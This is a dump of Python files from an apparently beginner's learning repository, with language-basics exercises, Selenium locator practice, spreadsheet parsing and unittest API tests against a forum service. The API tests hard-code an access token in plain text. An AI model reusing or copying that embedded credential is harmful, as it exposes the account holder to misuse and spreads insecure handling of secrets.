"src_encoding": "UTF-8", "text": "'''\nCreated on 2019年7月13日\n\n@author: asus\n'''\ndef make_car(business,type,**info):\n \"\"\"函数调用,被调用方\"\"\"\n build = {}\n build['bus']=business\n build['type']=type\n for key,value in info.items():\n build[key]=value\n return build" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 8.666666984558105, "blob_id": "9fbf48a76dc9f68fca4eff6f527b34ab8e8a1650", "content_id": "8fbfa916077fbd8a9752401d5c71cef2abdc2f12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/src/test_1130.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import sys\n\nprint (sys.argv)" }, { "alpha_fraction": 0.5879629850387573, "alphanum_fraction": 0.6018518805503845, "avg_line_length": 11.764705657958984, "blob_id": "1e851c58d71a09048cf3c3104e5c88bdb701ec2f", "content_id": "911834b2a258dcfebfac7027c4dcdda3dcc1c36d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 284, "license_type": "no_license", "max_line_length": 40, "num_lines": 17, "path": "/src/pytest_v/test_t1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "\"\"\"\n文件以test_开始 或者 以 _test结尾的py (test不区分大小写)\n\n\"\"\"\n\ndef test_l():\n\n \"\"\" test开始的函数会被当做测试用例直接执行\"\"\"\n assert True\n\n# content of test_sample.py\ndef inc(x):\n return x + 1\n\n\ndef test_answer():\n assert inc(3) == 5" }, { "alpha_fraction": 0.5099223256111145, "alphanum_fraction": 0.5159620642662048, "avg_line_length": 37.61666488647461, "blob_id": "2a9cf31fa362942e7ccf85700a8849739f9b0e1f", "content_id": "755bbc4b6a78b7dd59b22524e8e9b5a95a746419", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2456, "license_type": "no_license", "max_line_length": 108, "num_lines": 60, "path": "/src/test/selenium_1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport time\n\ndriver = webdriver.Chrome()\ndriver.get('https://www.baidu.com')\n\n# class_name find_element_by_class_name\ndriver.find_element_by_class_name(\"s_ipt\").send_keys('携程')\ntime.sleep(3)\n# driver.find_element_by_xpath('//input[contains(@id,\\'su\\')]').click()\ndriver.find_element_by_xpath('//*[@id=\"su\"]').click()\n\n# id find_element_by_id\n# driver.find_element_by_id('kw').send_keys('seke')\n# -----------------------------------------------------------------------------------------\n\n\n# name find_element_by_name\n# driver.find_element_by_name('wd').send_keys('sale')\n# -----------------------------------------------------------------------------------------\n\n\n# xpath find_element_by_xpath 绝对路径\n# driver.find_element_by_xpath('/html/body/div/div/div/div[3]/a').click()\n# -----------------------------------------------------------------------------------------\n\n\n# link_text find_element_by_link_tex 超链接文本\n# driver.find_element_by_link_text(\"新闻\").click()\n# -----------------------------------------------------------------------------------------\n\n\n# partial_link_text find_element_by_partial_link_text\n# driver.find_element_by_partial_link_text(\"新\").click()\n# -----------------------------------------------------------------------------------------\n\n\n# xpath find_element_by_xpath 相对路径\n# 1、标签名+节点属性 [//a[@class= \"s_bri\"]]\n# driver.find_element_by_xpath('//input[@name= \"wd\"]').send_keys('xxx')\n# driver.find_element_by_xpath('//a[@name=\"tj_trhao123\"]').click()\ntime.sleep(2)\ndriver.find_element_by_xpath(\n '//div[@class=\"ec-pl-padding-bottom-middle ec-pc_small_head-item ec-block-pc_small_head-0\"]//a').click()\n\n# 2、部署属性值匹配//标签名[contains(@属性名,部分属性值)]\n# driver.find_element_by_xpath('//a[contains(@name,\\'rvide\\')]').click()\n\n\n# 3、使用文本匹配 //标签名[contains(@属性名,部分属性值)]\n# driver.find_element_by_xpath('//a[contains(text(),\\'贴吧\\')]').click()\n\n# -----------------------------------------------------------------------------------------\n\n\n# css\ntime.sleep(4)\n# driver.find_element_by_css_selector('form[id=\\'chinaHotelForm\\'] input.w01.inputSel').click()\n# driver.find_element_by_xpath('//form[@id=\\'chinaHotelForm\\']//input[@name=\\'cityId\\']').send_keys(2)\ndriver.find_element_by_css_selector('form[id=\\'chinaHotelForm\\'] input[name=\\'cityId\\']').send_keys('上海')\n\n" }, { "alpha_fraction": 0.5443298816680908, "alphanum_fraction": 0.5628865957260132, "avg_line_length": 18.675676345825195, "blob_id": "74e7c8494f782b5e77e25ac8add5fde56a728506", "content_id": "cc5ee6e7018a2608c6289e485a65da0d7b12dec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1571, "license_type": "no_license", "max_line_length": 84, "num_lines": 74, "path": "/src/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "#input 控制台输入\nfrom multiprocessing import active_children\nfrom _ast import Num\n\nmessage_1 =\"print\"\nmessage_1 +=\": \"\nmessage = input(message_1)\nprint(message)\n\nage = input(\"how old are you ?\") \nage = int(age)#input为str类型,转换成int\nprint(age>=18)\n\ndouble_1 =input(\"输入数字\")\ndouble_1 = int(double_1)\nif double_1%2 == 0:\n print(\"双数\")\nelse: \n print(\"单数\")\n \n \n\n \n#while 循环---------------------------------------------------------------------------\nnumber1 = 1\nwhile number1 <=5:\n print(number1)\n number1 +=1\n#选择quit退出\nmessage =\"\"\nactive = True\nwhile active: #定义true\n message = input(\"prompt:\")\n if message ==\"quit\":\n break #退出循环\n# active = False\n else:\n print(message)\n\nnumber = 0\nwhile number <10:\n number +=1\n if number %2 ==0:\n continue #不再执行下方语句\n print(number)\n\nusers = ['alean' , 'mike' ,'dancy']\nusers_1 = []\nwhile users:\n user_info = users.pop()\n print(\"修改:\"+user_info)\n users_1.append(user_info)\n\nfor user in users_1:\n print(user)\n \npets =['dog','cat','rabit','cat','goldfish','cat']\nwhile 'cat' in pets:\n pets.remove('cat')\nprint(pets)\n\n#用户输入补充字典值\nresponses ={}\nwhile True:\n name = input(\"name:\")\n response = input(\"结果:\")\n responses[name]=name\n responses[response]=response\n repeat = input(\"继续?:\")\n if repeat =='quit':\n break\nprint('result: ')\nfor name,response in responses.items():\n print(name +\" \\n\"+ response)" }, { "alpha_fraction": 0.4884765148162842, "alphanum_fraction": 0.5217000842094421, "avg_line_length": 26.38524627685547, "blob_id": "8a5f811ebbaaa9db8fe2000de7004fcd9129d2d5", "content_id": "2b632b6370323422a5f272ca26c58505df8a0df9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3607, "license_type": "no_license", "max_line_length": 109, "num_lines": 122, "path": "/src/beautiful_report/API_test/testapi.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import requests\nimport unittest\nimport ddt\n\n\[email protected]\nclass test_topic_api(unittest.TestCase):\n '''\n 接口测试:数据驱动\n '''\n\n def test_topic(self):\n r = requests.get(url=\"http://39.107.96.138:3000/api/v1/topics?page=1&tab=ask&limit=1&mdrender=true\")\n print(r, type(r))\n # 响应结果 body 文本格式\n text = r.text\n print(\"text:\", type(text), text)\n # 响应结果 body 字典格式\n json = r.json()\n print('json', type(json), json)\n # 响应状态码\n statuscode = r.status_code\n assert statuscode == 200, \"状态码应该为200\"\n\n success = json['success']\n assert success, 'success 应该为True'\n\n # 对data 数据的长度进行断言\n data = json['data']\n assert len(data) == 1, \"响应数据应该只有1条\"\n\n for obj in data:\n assert obj['tab'] == 'ask', \"tab 值应该为ask\"\n\n # 数据驱动\n\n testdata = [\n {\"limit\": 1, \"tab\": \"ask\"},\n {\"limit\": 2, \"tab\": \"share\"},\n {\"limit\": 3, \"tab\": \"job\"},\n {\"limit\": 2, \"tab\": \"good\"}\n ]\n url = 'http://39.107.96.138:3000/api/v1/topics'\n\n @ddt.data(*testdata)\n def test_math(self, value):\n url = 'http://39.107.96.138:3000/api/v1/topics'\n print(type(value), value)\n r = requests.get(url, value)\n json = r.json()\n # 响应状态码\n statuscode = r.status_code\n assert statuscode == 200, \"状态码应该为200\"\n\n success = json['success']\n assert success, 'success 应该为True'\n\n # 对data 数据的长度进行断言\n data = json['data']\n assert len(data) == value['limit'], f\"响应数据应该只有{value['limit']}条\"\n\n for obj in data:\n assert obj['tab'] == value['tab'], f\"tab 值应该为{value['tab']}\"\n\n def test_new_topic(self):\n '''\n 发帖\n :return:\n '''\n baseurl = 'http://39.107.96.138:3000/api/v1'\n url = baseurl + '/topics'\n testdata = {\n \"accesstoken\": \"fc45e11f-6017-41c1-a659-fd5b11bd805d\",\n \"title\": \"1111ssssssss\",\n \"tab\": \"ask\",\n \"content\": \"xxxxxxxxxxxxx\"\n }\n r = requests.post(url=url, data=testdata)\n print(r.json())\n # 请求头信息\n print(r.request.headers)\n json = r.json()\n assert r.status_code == 200\n\n success = json['success']\n assert success\n\n test_topic_api.topic_id = json['topic_id']\n assert test_topic_api.topic_id is not None\n return test_topic_api.topic_id\n\n\n\n\n def test_topic_tt(self):\n '''\n 获取topic\n :return:\n '''\n print(self.topic_id)\n detail_url = 'http://39.107.96.138:3000/api/v1' + '/topic/' + test_topic_api.topic_id\n paramsdata = {'mdrender': 'false'}\n res = requests.get(url=detail_url, params=paramsdata)\n assert res.status_code == 200\n resjson = res.json()\n\n assert resjson['success']\n\n resjsondata = resjson['data']\n testdata = {\n \"accesstoken\": \"fc45e11f-6017-41c1-a659-fd5b11bd805d\",\n \"title\": \"1111ssssssss\",\n \"tab\": \"ask\",\n \"content\": \"xxxxxxxxxxxxx\"\n }\n assert resjsondata['tab'] == testdata[\"tab\"], \"发帖板块应该为\" + testdata['tab']\n assert resjsondata['title'] == testdata[\"title\"], \"发帖标题应该为\" + testdata['title']\n assert resjsondata['content'] == testdata[\"content\"], \"发帖内容应该为\" + testdata['content']\n\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.6460176706314087, "alphanum_fraction": 0.6460176706314087, "avg_line_length": 26.15999984741211, "blob_id": "3523fb19f216769a5966fb4762e2ace7c14ccc7c", "content_id": "0e29740e0c0e9f7f25316a989e9e0dbd6f9bd4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 67, "num_lines": 25, "path": "/src/testcase/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\n\nfrom testcase.name_function import get_formatted_name,AnoymoisSurey\nprint(\"Enter 'q' at any time to quit\" )\nwhile True:\n first = input(\"first: \")\n if first == 'q':\n break\n last = input(\"last: \")\n if last == 'q':\n break\n formatted_name = get_formatted_name(first, last)\n print('formatted_name:\\t' + formatted_name)\n\nquestion= \"What are you learn?\" #定义问题,创建对象\nmy_surver = AnoymoisSurey(question)\nmy_surver.show_question()\nprint(\"Enter 'q' at any time to quit\")\nwhile True:\n response = input(\"result: \")\n if response == 'q':\n break\n my_surver.store_response(response)\nprint(\"显示结果:\")\nmy_surver.show_results()" }, { "alpha_fraction": 0.5828025341033936, "alphanum_fraction": 0.6019108295440674, "avg_line_length": 21.428571701049805, "blob_id": "2ff7b7cf099e98343400d97a808f85430e772854", "content_id": "3a5cf694ab160b9cb19d25dc1caf00625450e34e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 48, "num_lines": 14, "path": "/src/pytest_v/testcase/testTime.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import time\nfrom time import strftime\ndef func():\n starttime = time.perf_counter()\n for x in range(10):\n time.sleep(0.1)\n endtime = time.perf_counter()\n print(f'时间{endtime - starttime}')\n\ndef fun1():\n return strftime('%Y_%M_%d',time.localtime())\n\nif __name__ == '__main__':\n print(fun1())\n" }, { "alpha_fraction": 0.621411919593811, "alphanum_fraction": 0.6377036571502686, "avg_line_length": 35.82857131958008, "blob_id": "f696f0d5beb6de83a891faf8a54b6b9c6c4b05e0", "content_id": "9c4b63abef5a311b1c577b49f29ba3752dcda0d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 114, "num_lines": 35, "path": "/src/class_1/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from collections import OrderedDict\n\nfrom class_1.class1 import Car,ElectriCar\n# my_dog = Dog('white',6)\n# her_dog=Dog('red',3)\n# print ('name:'+my_dog.name + 'age:'+ str(my_dog.age))\n# my_dog.sit()\n# my_dog.roll_over()\n# her_dog.sit()\n# her_dog.roll_over()\n#class类-----------------------------------------------------------------------------------------------------------\nmy_new_car= Car('audi','24',2016)\nprint(my_new_car.get_descriptive_name())\nmy_new_car.odometer_reading = 23 #修改默认值\nmy_new_car.read_odometer()\nmy_new_car.update_odometer(30) #调用方法更新里程数\nmy_new_car.read_odometer()\nmy_new_car.increment_odmeter(3)\nmy_new_car.read_odometer()\n#子父类调用--------------------------------\nmy_tesla = ElectriCar('tesla','model_s',2016)\nprint(my_tesla.get_descriptive_name())\nmy_tesla.describe_battery()\nmy_tesla.fill_gas()\nmy_tesla.battery_size.describe_battery() # 调用ElectriCar 属性的battery_size ,调用Battery()\nmy_tesla.battery_size.get_rang() #获取里程数\nmy_tesla.battery_size.battery_size = 85 #调用Battery() 修改电池属性\nmy_tesla.battery_size.get_rang()\n#OrderedDict 创建空字典\nfavorite_language = OrderedDict()\nfavorite_language['jen']='python'\nfavorite_language['aa']='c'\nfavorite_language['cc']='java'\nfor name,language in favorite_language.items():\n print(name.title()+language.title())\n" }, { "alpha_fraction": 0.5258192420005798, "alphanum_fraction": 0.532274067401886, "avg_line_length": 29.530303955078125, "blob_id": "49aa79c922b120b861fb356078111dcf829c360c", "content_id": "d1958621b27176b6341aeccf92a662a108091207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2380, "license_type": "no_license", "max_line_length": 64, "num_lines": 66, "path": "/src/class_1/class1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class Dog():\n def __init__(self,name,age):\n \"\"\"\"一次模拟小狗的尝试\"\"\"\n \"\"\"\"初始化属性name和age\"\"\"\n self.name = name\n self.age = age\n\n def sit(self):\n \"\"\"\"模拟小狗命令蹲下\"\"\"\n print (self.name.title()+\" is now sitting\")\n def roll_over(self):\n \"\"\"模拟小狗命令时打滚\"\"\"\n print (self.name.title()+\" rolled over\")\n\n\nclass Car():\n \"\"\"\"一次模拟汽车\"\"\"\n def __init__(self,make,model,year):\n \"\"\"初始化汽车属性\"\"\"\n self.make = make\n self.model =model\n self.year =year\n self.odometer_reading=0 #添加默认值\n def get_descriptive_name(self):\n \"\"\"获取完整信息\"\"\"\n long_name = str(self.year)+' '+self.make+' '+self.model\n return long_name.title()\n def read_odometer(self):\n \"\"\"打印里程书\"\"\"\n print('里程数'+str(self.odometer_reading))\n def update_odometer(self,mileage):\n \"\"\"更新里程数且禁止将里程数回调\"\"\"\n if(self.odometer_reading<mileage):\n self.odometer_reading=mileage\n else:\n print(\"You can't roll back an odometer\")\n def increment_odmeter(self,mailes):\n \"\"\"将里程数增加指定值\"\"\"\n self.odometer_reading += mailes\nclass ElectriCar(Car):\n \"\"\"电动汽车的独特之处\"\"\"\n def __init__(self,make,model,year): #创建实例\n \"\"\"初始化父类属性,初始化子类属性\"\"\"\n super().__init__(make,model,year) #super 使实例有父类的属性\n self.battery_size = Battery()\n def describe_battery(self):\n print(str(self.battery_size))\n def fill_gas(self):\n print(\"有油布\")\n def fill_gas(self): #方法重写\n print(\"没油了\")\nclass Battery():\n \"\"\"模拟电动车电瓶\"\"\"\n def __init__(self,battery_size=60): #初始化子类特有属性\n \"\"\"初始化电瓶属性\"\"\"\n self.battery_size=battery_size\n def describe_battery(self):\n \"\"\"打印电瓶属性\"\"\"\n print(\" test\"+str(self.battery_size))\n def get_rang(self):\n \"\"\"打印信息,指出电瓶续航里程数\"\"\"\n if self.battery_size == 60:\n range= 180\n elif self.battery_size == 85:\n range =270\n print(\"续航里程数:\"+str(range))" }, { "alpha_fraction": 0.6012510061264038, "alphanum_fraction": 0.6161063313484192, "avg_line_length": 14.802469253540039, "blob_id": "5ad78ae61c16e06f42e933b72158ed729b580509", "content_id": "eac6b264ed27f414cb7bfbe5dcb605127d574883", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 44, "num_lines": 81, "path": "/src/learn/day4_装饰器.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def login(func):\n def inner(*arg, **kwargs):\n print('passed user version...')\n return func(*arg, **kwargs)\n\n return inner\n\n\n# 无参数的,返回内存地址。不调用tv\n@login\ndef home_page(name):\n print('Welcome %s to home page' % name)\n\n\n@login\ndef tv(name, password=123):\n print('Welcome %s to TV page' % name)\n return 4\n\n\n@login\ndef movie(name):\n print('Welcome %s to MOVIE page' % name)\n\n\n# tv = login(tv)\ntv('alex', password=456)\nprint(tv)\nmovie('alex')\n\n\n# !/usr/bin/env python\n# coding:utf-8\n\ndef Before(request, kargs):\n print('before')\n\n\ndef After(request, kargs):\n print('after')\n\n\ndef Filter(before_func, after_func):\n def outer(main_func):\n def wrapper(request, kargs):\n before_func(request, kargs)\n\n main_func(request, kargs)\n\n after_func(request, kargs)\n\n return wrapper\n\n return outer\n\n\n@Filter(Before, After)\ndef Index(request, kargs):\n print('index')\n\n\nIndex('rpr', 'alex')\n\n\ndef w1(main_func):\n def outer1(request, kargs):\n print('before1')\n main_func(request, kargs)\n print('after1')\n return outer1\n\n\n@w1\ndef show(request, kargs):\n print('show1')\n\n#执行w1,把自己装饰的函数的函数名作为参数,w1(show)\n#show函数重新定义,w1(show)返回值\n#新show = def outer1(request, kargs)\n\nshow('rpr', 'alex')" }, { "alpha_fraction": 0.7166666388511658, "alphanum_fraction": 0.737500011920929, "avg_line_length": 15.066666603088379, "blob_id": "9bc1985d2c279ccee240175f76ae48398c23d6e0", "content_id": "47465a4b678d0f4992e254ee72d0bc49edfa447e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 37, "num_lines": 15, "path": "/src/pytest_v/testcase/testopenpyxl.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from openpyxl import Workbook\n#实例化对象\nworkbook = Workbook()\n#创建一个sheet\nworksheet = workbook.active\n\n\nworksheet['A1'] = 'a1'\nworksheet['B1'] = 'b1'\n\nprint(worksheet.title)#sheet名\n\nworksheet.title = '测试1'\n\nworkbook.save(filename='testexl.xls')" }, { "alpha_fraction": 0.5717131495475769, "alphanum_fraction": 0.5836653113365173, "avg_line_length": 22.904762268066406, "blob_id": "3a6ef16b335ce034cf3a69233497e144952d385f", "content_id": "2415e57c70ad2eab848387420d89732c067a9bc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 93, "num_lines": 42, "path": "/src/pytest_v/common/do_data.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import csv\nfrom openpyxl import load_workbook\n'''\n解析数据文件\n'''\n\ndef do_csv(csvpath):\n data = []\n with open(csvpath,mode='r',encoding='utf8') as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n print(line)\n data.append(tuple(line))\n\n return data\n\ndef do_xls(xlspath):\n workbook = load_workbook(filename=xlspath)\n #sheetname sheet的名\n sheet_name = workbook.sheetnames\n #当前打开的s\n worksheet = workbook['测试1']\n\n #整合xlsx数据 方法1\n # data = []\n # testdata= []\n # for i in range(1,4):\n # for x in range(1,4):\n # data.append(worksheet.cell(row=i,column=x).value)\n # testdata.append(tuple(data))\n #整合xlsx数据 方法2\n testdata=[]\n for row in worksheet.iter_rows(min_col=0,max_col=3,min_row=0,max_row=3,values_only=True):\n # print(row)\n testdata.append(row)\n\n return testdata\n\nif __name__ == '__main__':\n #print(do_csv('../data/data.csv'))\n print(do_xls('../data/test.xlsx'))\n" }, { "alpha_fraction": 0.5454817414283752, "alphanum_fraction": 0.6065230369567871, "avg_line_length": 17.059459686279297, "blob_id": "c7cd5ca8b370158a120893bafd46b1070bde6188", "content_id": "fa6328d4d3046db1de06f699447b02b98856a163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3794, "license_type": "no_license", "max_line_length": 66, "num_lines": 185, "path": "/src/learn/day3.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "s1 = set() # 防止重复\ns1.add('alex') # 添加\nprint(s1)\ns1.add('alex')\nprint(s1)\n\ns2 = s1.copy() # 复制\nprint(s2)\n\ns3 = set(['alex', 'eric', 'tony', 'alex']) # 列表自动去重\nprint(s3)\n\ns4 = s3.difference(['alex', 'eric'])\nprint(s4) # 打印不同的值\n\ns4 = s3.difference_update(['alex', 'eric'])\n\nret = s3.pop()\nprint(s3)\n\nold_dict = {\n \"#1\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80},\n \"#2\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80},\n \"#3\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80}\n}\n\n# cmdb 新汇报的数据\nnew_dict = {\n \"#1\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 800},\n \"#3\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80},\n \"#4\": {'hostname': 'c1', 'cpu_count': 2, 'mem_capicity': 80}\n}\n'''要old_dict要更新的数据'''\n# 交集:要更新的数据\nold = set(old_dict.keys())\nnew = set(new_dict.keys())\nupdate_set = old.intersection(new)\nprint(update_set)\n# 差集:原来要更新的\ndelete_set = old.symmetric_difference(update_set) # 要删除的集合\n# delete_set = old.difference(update_set)\nprint(delete_set)\n\nadd_set = new.symmetric_difference(update_set) # 要添加的集合\nprint(add_set)\n\n# 比较difference 和symmetric_difference差异\ns1 = set([11, 22, 33])\ns2 = set([22, 44])\nret1 = s1.difference(s2) # 单边的差别\nret2 = s1.symmetric_difference(s2) # 两边的差别\nprint(ret1)\nprint(ret2)\n\nfrom collections import Counter\n\nobj1 = Counter('aaaabbbasbdasbdabdasbdadsb,b') # 计数器\nprint(obj1)\n\nret = obj1.most_common(4) # 打印最多的4位\nprint(ret)\n\nt = [k for k in obj1.elements()] # 获取所有元素\nprint(t)\n\nfor k, v in obj1.items():\n print(k, v)\n\nobj = Counter(['11', '22', '33'])\nprint(obj)\nobj.update(['eric', '11', '11'])\nprint(obj)\nobj.subtract(['eric', '11', '11'])\n\n# 有序字典\n\nfrom collections import OrderedDict\n\ndic = OrderedDict()\ndic['k1'] = 'v1'\ndic['k2'] = 'v2'\ndic['k3'] = 'k3'\ndic.setdefault('k4', '66') # 默认值\nprint(dic)\n\n# dic.move_to_end('k1') #移动\n# print(dic)\n\ndic.popitem() # 后进先出,取最后一个\nprint(dic)\n\ndic.update({'k1': 'v111', 'k10': 'v10'})\nprint(dic)\n\n# 默认字典\nfrom collections import defaultdict\n\nmy_dict = defaultdict(list)\nmy_dict['k1'].append('v1')\nprint(my_dict)\n\nb = []\na = [4, 1, 2, 6, 5, 7]\nfor i in a:\n if not b:\n b.append(i)\n if i > b[-1]:\n b.append(i)\nprint(b)\n\n# 可命名元组\nfrom collections import namedtuple\n\nMytuple = namedtuple('Mytuple', ['x', 'y', 'c'])\nobj = Mytuple(11, 22, 33)\nprint(obj.x)\nprint(obj.y)\nprint(obj.c)\n\n# 双向队列\nfrom collections import deque\n\nd = deque()\nd.append('1')\nd.appendleft('10') # 左边添加\nd.appendleft('1')\nr = d.count('1') # 1的个数\nprint(d)\nprint(r)\nd.extend(['22', '33', '33'])\nd.extendleft(['22', '33', '33'])\nprint(d)\nd.rotate(1) # 尾部拿数据插前面\nprint(d)\n\n# 单向队列\nimport queue\n\nq = queue.Queue()\nq.put('123') #放入先进先出原则\nq.put('456')\nq.put('789')\nprint(q.qsize()) #返回队列元素个数\nprint(q)\nprint(q.get())\n\n#深浅拷贝\n\nimport copy\n\na1 = 123456\n# b1 = 123456\na2 = a1 # 赋值\nprint(id(a1))\nprint(id(a2))\n\na3 = copy.deepcopy(a1)\nprint(id(a3)) # copy和deepcoopy一致\n\n# 其他元组、字典等\nn1 = {'k1': 'w1', 'k2': 123, 'k3': ['alex', 123456]}\nn2 = copy.copy(n1) #浅拷贝,只会拷一层,嵌套多层的则不会拷\nprint(id(n1['k3']))\nprint(id(n2['k3']))\n\nprint(id(n1))\nn3 = copy.deepcopy(n1) #深拷贝,全都会拷贝\nprint(id(n3))\n\ndic = {\n 'cpu':[80,],\n 'mem':[80,],\n 'disk':[80,]\n}\nprint(dic)\nnew_dic = copy.deepcopy(dic)\nnew_dic['cpu'][0] = 50 #浅拷贝,修改拷贝后的内容时会使原数据也改变\nprint('before',dic)\nprint(new_dic)\n\n\nprint(new_dic.keys())\n\nfor i in new_dic.keys():\n print(i)\n\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 35.733333587646484, "blob_id": "dba0072144fe19d027a8b69a16207872ccfb963d", "content_id": "fa80b2ab455dedbbb5c8fd8838a9d610bd16acb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 586, "license_type": "no_license", "max_line_length": 85, "num_lines": 15, "path": "/src/beautiful_report/test_api.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\nfrom BeautifulReport import BeautifulReport #导入BeautifulReport\nfrom testapi import test_topic_api\n\n\n\n\nif __name__ == '__main__':\n test_suite = unittest.defaultTestLoader.discover('testcase/', pattern='test*.py')\n test_suite.addTest(test_topic_api('test_topic'))\n test_suite.addTest(test_topic_api('test_new_topic'))\n #test_suite.addTest(test_topic_api('test_math'))\n result = BeautifulReport(test_suite)\n result.report(filename='测试报告', description='测试deafult报告', log_path='report')\n #log_path='.'把report放到当前目录下" }, { "alpha_fraction": 0.519175112247467, "alphanum_fraction": 0.5730825066566467, "avg_line_length": 19.62686538696289, "blob_id": "7e26129824bc6e5503ffc74cc7e3ded715d97a35", "content_id": "8a4dfb01fb7d189f944cb7e11a746d773b25e0b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3130, "license_type": "no_license", "max_line_length": 48, "num_lines": 134, "path": "/src/learn/day2-int-str-list.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "name = int(1)\nprint(type(name))\n'''int常用方法'''\nage = -18\nprint(age.__abs__()) # 绝对值\nprint(age.__add__(100))\nprint(age.__bool__()) # 返回布尔\nprint(type(age))\nprint(type(age.__float__())) # 转换成浮点类型\n\nprint(age.__floordiv__(6)) # 地板除\nprint(age.__ge__(8))\n\nall_item = 95\npager = 10\nresult = all_item.__divmod__(pager)\nprint(result) # (9,5) 9余5 除法\nresult1 = all_item.__rdivmod__(pager)\nprint(result1)\n\n'''str常用方法'''\nname = 'hello'\nprint(type(name)) # 获取类\nprint(dir(name)) # 获取成员\n\nresult = name.__contains__('llo') # 是否包含\nresult = name.capitalize() # 首字母大写\nresult = name.casefold() # 小写\nresult = name.center(20, '*') # 字符位置\nresult = name.count('l') # 字符出现次数\nresult = name.encode('GBK') # 转换编码格式\nresult = name.endswith('e', 0, 2)\nprint(result)\n\nname1 = '\\talex'\nprint(len(name1))\nresult = name1.expandtabs() # TAB转换成空格\nprint(result)\nprint(len(result))\n\nresult = name1.find('a') # 查找a位置\nresult = name1.index('a')\nprint(result)\n\nname = 'alex {0} as {1}'\nresult = name.format('sb', 'eric') # 字符串的拼接0\nli = ['1', '2', '3']\n\nprint(result)\nresult = '_'.join(li) # 序列拼接_ 可以为空\nprint(result)\n\n# #转换,需要先做一个对应表,最后一个表示删除字符集合\n# intab = \"aeiou\"\n# outtab = \"12345\"\n# trantab = maketrans(intab, outtab)\n# str = \"this is string example....wow!!!\"\n# str.translate(trantab, 'xm')\n\nname = 'alexissb'\nresult = name.partition('is') # 以is切分\nprint(result)\n\nprint(name.replace('s', 'o', 1))\n\nprint(name.split()) # 分割\nprint(name.swapcase()) # 大小写转换\n\n'''list常用方法'''\nlist1 = [i for i in range(10)]\nprint(list1)\nlist1.extend((11, 22, 22,))\nprint(list1)\n\nlist1.insert(0, 33) # 指定下标插入\nprint(list1)\n\nprint(list1.pop(0)) # 打印删除的0位置的值\nprint(list1)\n\nlist1.remove(22) # 去除第一个22\nprint(list1)\n\nlist1.reverse() # 列表反转\nprint(list1)\n\n'''元组常用方法'''\nl1 = [11, 22, 33,]\ntu1 = tuple(l1) # 列表转换成元组\nprint(tu1)\n\ntu = (11, 22, 33,) #元组转列表\nl2 = list(tu)\nprint(l2)\n\n'''字典常用方法'''\ndic = {'k1':'k2'}\ndic = dict(k1 = 'k2',k2 = 'k3')\nprint(dic.fromkeys(['k1','k2','k3'],'v1'))\nprint(dic.get('k4','alex'))\ndic.pop('k1') #删除指定值\nprint(dic)\ndic.setdefault('k1') #设置值\nprint(dic)\nret = dic.update({'k3':123}) #更新值\nprint(dic)\nfavorite_language = {\n 'jen': ['python', 'ruby'],\n 'mike': 'java',\n 'phil': ['c', 'java'],\n 'tom': ['python', 'haskill']\n}\nfor name, language in favorite_language.items():\n print(name.title(),language)\n\n#{'k1':[66,77,88,99],'k2}:[11,22,33,44,55]\ndef test():\n dic ={}\n all_list = [11,22,33,44,55,66,77,88,99,]\n for i in all_list :\n if i>66 :\n if 'k1' in dic.keys():\n dic['k1'].append(i)\n else:\n dic['k1'] = [i,]\n else:\n if 'k2' in dic.keys():\n dic['k2'].append(i)\n else:\n 